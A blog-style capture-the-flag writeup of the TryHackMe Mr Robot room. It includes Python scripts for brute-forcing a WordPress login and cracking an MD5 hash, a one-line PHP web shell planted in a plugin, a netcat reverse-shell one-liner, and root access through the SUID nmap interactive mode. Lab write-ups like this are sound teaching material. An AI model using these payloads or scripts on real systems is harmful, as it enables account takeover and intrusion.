TryHackMe: Mr Robot CTF (Writeup)

0xDantas
5 min read · May 8, 2023


Introduction

Challenge link: https://tryhackme.com/room/mrrobot

A brief introduction to the challenge:

Based on the Mr. Robot show, can you root this box?

Setup Environment

# Starting VPN
sudo openvpn --config <YOUR_VPN_NAME>.ovpn --data-ciphers AES-256-CBC
# Verifying our IP (tun0 is the VPN interface)
ifconfig | grep "tun0" -A 1 | grep "inet"
# Adding as Host ("sudo echo ... >> /etc/hosts" fails because the redirection runs as your user; tee runs as root)
echo "<IP-BOX> ctf.thm" | sudo tee -a /etc/hosts
# Is host alive?
ping -c 3 ctf.thm

Now, let’s pwn this!

Recon

To start, let’s scan the host with nmap (-A turns on version detection, default scripts, OS detection and traceroute; without -p- it only covers the 1000 most common ports):

nmap -A ctf.thm -oN recon.txt
% cat recon.txt

# Nmap 7.93 scan initiated Mon May 8 13:05:55 2023 as: nmap -A -oN recon.txt ctf.thm
Nmap scan report for ctf.thm (10.10.222.229)
Host is up (0.22s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 8 13:06:32 2023 -- 1 IP address (1 host up) scanned in 37.82 seconds

Only HTTP and HTTPS are open (SSH is closed, and the TLS certificate is a placeholder for www.example.com), so let’s explore the web server!

Main Page

Exploring all the pages, we find no obvious entry point except the “join” page. Inspecting the source code, we can see that the server runs on top of a CMS: WordPress!

Server runs WordPress

By default, WordPress serves its login form at wp-login.php. Try to access it and… BINGO!

WP login page

As it’s a thematic room, we have two obvious candidate usernames: “mrrobot” and “elliot”.

Logging in as “mrrobot”
Logging in as “elliot”

The two failures look different: for “mrrobot” WordPress answers that the username is invalid, while for “elliot” it says the password is incorrect. That difference in error messages is a classic username-enumeration leak, and it tells us there is a user elliot with an as-yet-unknown password. So, let’s find that password.

One thing we haven’t done yet is directory fuzzing. Even before that, trying default files like robots.txt and sitemap.xml pays off:

robots.txt

It lists two files. The second one, fsocity.dic, is a password dictionary; downloading it shows 858160 lines, many of them duplicates. Let’s deduplicate the list and prepare it for our attack.

# Downloading the .dic
wget http://ctf.thm/fsocity.dic
# Removing repeated words (sort -u does the same in one step)
sort fsocity.dic | uniq > wordlist.txt

Our wordlist went from 858160 to 11451 lines!

Let’s prepare our attack.

Exploitation

Getting the password with a brute-force attack

For the attack, I’ll use Burp Suite.

To begin with, let’s intercept a login request to see how the parameters are sent:

Request Header

The username and password travel as plain POST body parameters, so we can brute-force the login by marking the value of the “&pwd=” field as the payload position and keeping the username fixed to elliot.

# Send request to Intruder

> (Right Click)
> (Send to Intruder)

> (Payloads)
> (Copy our wordlist.txt and Paste)

> (Positions)
> (Clear §)
> (Add §) -> (&pwd=§123§&)

> (Start Attack)

The logic: a failed login re-renders the form with status 200, while the correct password makes WordPress redirect to wp-admin. So we sort the Intruder results by status code and look for the single 3XX response (a different response length also gives it away).

Attack successful

Now, with username and password, we can access the admin panel.
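The same attack scripted in Python, added here as an example rather than the author’s Burp workflow. It assumes the ctf.thm host and wp-login.php path from this writeup, the standard WordPress form fields log and pwd, and the classic WordPress error strings (newer releases word them differently); the brute force stops early if the username-enumeration check says the account does not exist.

```python
"""Password brute force against wp-login.php, with the username check first.

Added example for this writeup (not the author's code). Assumptions: host and
path from the writeup, classic WordPress error strings, form fields log / pwd.
"""
import http.cookiejar
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://ctf.thm/wp-login.php"  # assumption: host from the writeup


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 302 itself is the success signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, body):
    """Map a wp-login.php response to what it tells the attacker.

    Success: WordPress answers 302 to wp-admin. Failure: the form is re-rendered
    with 200, and the error text differs depending on whether the user exists."""
    if status in (301, 302, 303, 307, 308):
        return "success"
    if "Invalid username" in body:
        return "no-such-user"
    if "password you entered for the username" in body:
        return "wrong-password"
    return "unknown"


def attempt(user, pwd, url=TARGET, timeout=10):
    """One login attempt; returns classify()'s verdict."""
    form = {
        "log": user,
        "pwd": pwd,
        "wp-submit": "Log In",
        "redirect_to": url.replace("wp-login.php", "wp-admin/"),
        "testcookie": "1",
    }
    req = urllib.request.Request(
        url,
        data=urllib.parse.urlencode(form).encode(),
        # WordPress refuses logins without its test cookie when testcookie=1 is posted
        headers={"Cookie": "wordpress_test_cookie=WP+Cookie+check"},
    )
    opener = urllib.request.build_opener(
        NoRedirect, urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar())
    )
    try:
        with opener.open(req, timeout=timeout) as resp:
            return classify(resp.getcode(), resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as err:  # raised for the 302 we refused to follow
        return classify(err.code, err.read().decode(errors="replace"))


def dedupe(words):
    """Drop duplicates but keep first-seen order (sort | uniq reorders, this does not)."""
    seen, out = set(), []
    for word in words:
        word = word.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def brute_force(user, wordlist, url=TARGET):
    """Try each candidate; stop early if the username turns out not to exist."""
    for pwd in dedupe(wordlist):
        verdict = attempt(user, pwd, url)
        if verdict == "success":
            return pwd
        if verdict == "no-such-user":
            raise ValueError(f"{user!r} does not exist, no point in continuing")
    return None


if __name__ == "__main__":
    with open("fsocity.dic") as fh:
        print(brute_force("elliot", fh))
```

Feeding the raw fsocity.dic works because dedupe() does the same job as the sort | uniq step; against a live target, expect one request per candidate and no lockout on a stock WordPress install, which is exactly why this attack is practical.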

Getting a TTY Shell

Now, as admin, we can edit plugin source code through WordPress’s built-in file editor. This is possible only because the site has not disabled it: setting DISALLOW_FILE_EDIT to true in wp-config.php removes the editor and closes this path, which is why hardening guides insist on it.

[ Activate the plugin "Simple-Tags" ]

(Plugins) > (Editor) > (Select "Simple-Tags" plugin) > (Ctrl+A + DEL)

[ PASTE THIS! ]

<?php system($_GET["cmd"]); ?>

And update the file!

Requesting that plugin file directly with a cmd parameter now runs our command as the web server user (daemon on this box). Let’s turn it into a reverse shell:

# Netcat listener on the attacking machine
ncat -nlvp 4444
# Payload to run on the target; URL-encode it before placing it in the cmd parameter,
# otherwise & and ; are interpreted by the query string instead of reaching /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f
# Paste the encoded payload here
"http://ctf.thm/wp-content/plugins/simple-tags/simple-tags.php?cmd=<HERE>"
Reverse Shell

Now let’s upgrade to a proper TTY shell:

# Type:
export TERM=xterm
python3 -c "import pty;pty.spawn('/bin/bash');"   # use python if python3 is missing on the box
cd

Privesc

# Exploring /home as daemon

% ls -al /home; cd /home

total 12
drwxr-xr-x 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
drwxr-xr-x 2 root root 4096 Nov 13 2015 robot

% ls -al robot

total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5

% cat key-2-of-3.txt

cat: key-2-of-3.txt: Permission denied

% cat password.raw-md5

robot:[ REDACTED ]

That looks like a raw MD5 hash: the file is 39 bytes, which is “robot:” plus a 32-character hex digest plus a newline. MD5 is a hash, not encryption, so it cannot be decoded; what an online “MD5 decrypter” really does is look the digest up in a table of precomputed hashes of common passwords. Let’s do that.

MD5 Decrypter
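The same idea done offline, added here as an example (the writeup used a web lookup service): parse the robot:digest line, then hash candidate passwords until one matches. The sample line and password below are constructed; the real target is the redacted hash together with the wordlist already built from fsocity.dic.

```python
"""Offline dictionary attack on the robot:<md5> line from password.raw-md5.

Added example (not from the writeup). The sample hash below is built from a
made-up password so the file runs stand-alone; point crack_md5 at the real
digest and at wordlist.txt or a general list such as rockyou.
"""
import hashlib

HEX = set("0123456789abcdef")


def parse_raw_md5(line):
    """password.raw-md5 holds 'user:hexdigest' (6 + 32 + newline = the 39 bytes
    ls showed). Return (user, digest) and refuse anything that is not raw MD5."""
    user, _, digest = line.strip().partition(":")
    digest = digest.strip().lower()
    if not user or len(digest) != 32 or not set(digest) <= HEX:
        raise ValueError("not a user:raw-md5 line")
    return user, digest


def crack_md5(digest, candidates):
    """Hash each candidate and compare: MD5 cannot be 'decrypted', only matched.
    Candidates may come straight from an open file (newlines are stripped)."""
    digest = digest.lower()
    for pw in candidates:
        pw = pw.rstrip("\r\n")
        if hashlib.md5(pw.encode()).hexdigest() == digest:
            return pw
    return None


# Constructed sample: a fake password hashed here, plus a few decoy candidates.
SAMPLE_PASSWORD = "fsociety-demo-pass"
SAMPLE_LINE = "robot:" + hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()
SAMPLE_WORDS = ["password", "elliot", SAMPLE_PASSWORD, "mrrobot"]


def demo():
    """Crack the constructed sample; returns (user, recovered password)."""
    user, digest = parse_raw_md5(SAMPLE_LINE)
    return user, crack_md5(digest, SAMPLE_WORDS)


if __name__ == "__main__":
    print(demo())
    # Real run on the box's file and the wordlist built earlier:
    # user, digest = parse_raw_md5(open("password.raw-md5").readline())
    # with open("wordlist.txt") as fh:
    #     print(user, crack_md5(digest, fh))
```

For anything bigger than a CTF list, hashcat does the same comparison on the GPU; its mode 0 is raw MD5, and an unsalted digest like this one is exactly the case where a plain wordlist attack is enough.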
# Logging as robot and Getting 2nd flag

% su robot
Password: [ REDACTED ]

robot@linux:~$

robot@linux:~$ cat key-2-of-3.txt

[ REDACTED ]

Now, to get root, let’s look for SUID binaries (executables that run with their owner’s privileges no matter who launches them) and see whether any of them is misconfigured or exploitable:

robot@linux:~$ find / -type f -perm -4000 2> /dev/null

/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

robot@linux:~$ nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

Most of these are stock distribution binaries with well-known behaviour. The odd one out is /usr/local/bin/nmap: a locally installed copy, and version 3.81 is old enough to still have the interactive mode that later releases removed. GTFOBins lists it as a way to spawn a shell, and because the binary is SUID root, that shell inherits root’s effective UID.
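A Python version of that find, plus the triage step, added as an example (not from the writeup). The baseline set is constructed from the listing above and stands in for what a stock install ships with; the point is that /usr/local/bin/nmap is the one entry outside it, which is where you look first.

```python
"""Find SUID files and flag the ones that deserve a closer look.

Added example (not from the writeup). BASELINE is constructed from the find
output in the writeup; tune it for the distribution you are on.
"""
import os
import stat

# Assumption: stock SUID binaries for this box, taken from the listing above.
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/umount", "/bin/mount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}
# Locations a package manager does not normally write SUID binaries to.
UNPACKAGED = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")
PSEUDO_FS = ("/proc", "/sys", "/dev")


def find_suid(root="/"):
    """Equivalent of find / -type f -perm -4000, returning (path, owner uid)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.startswith(PSEUDO_FS):
            dirnames[:] = []  # do not descend into kernel pseudo filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: the mode of a symlink itself is irrelevant
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def triage(paths, baseline=BASELINE):
    """Return (path, reason) for every SUID file that is not a known stock one."""
    findings = []
    for path in paths:
        if path in baseline:
            continue
        reason = "non-packaged location" if path.startswith(UNPACKAGED) else "not in baseline"
        findings.append((path, reason))
    return findings


if __name__ == "__main__":
    root_owned = [path for path, uid in find_suid() if uid == 0]
    for path, reason in triage(root_owned):
        print(f"{path}: {reason}")
```

Only root-owned files matter for this escalation (a SUID file owned by an unprivileged user only gives you that user), and a hit under /usr/local or /opt is worth checking against GTFOBins before the stock ones, since distributions patch and restrict the latter.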

Nmap vulnerable version
robot@linux:~$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
root
#

We are ROOT! (The spawned /bin/sh keeps the effective UID inherited from the SUID binary; had it been bash, it would have dropped that privilege unless started with -p.) Let’s take the last flag!

# ls -l /root

total 4
-rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
-r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt

# cat /root/key-3-of-3.txt

[ REDACTED ]

Until Next Time…

Thank you for reading this writeup, I hope you enjoyed and learned something new today. I’m planning to post more blog posts just like these, so keep an eye here. If you would like to connect with me or give me feedback, send an email to dantsec@proton.me!

MR Robot isn’t a robot. (wait, what?)
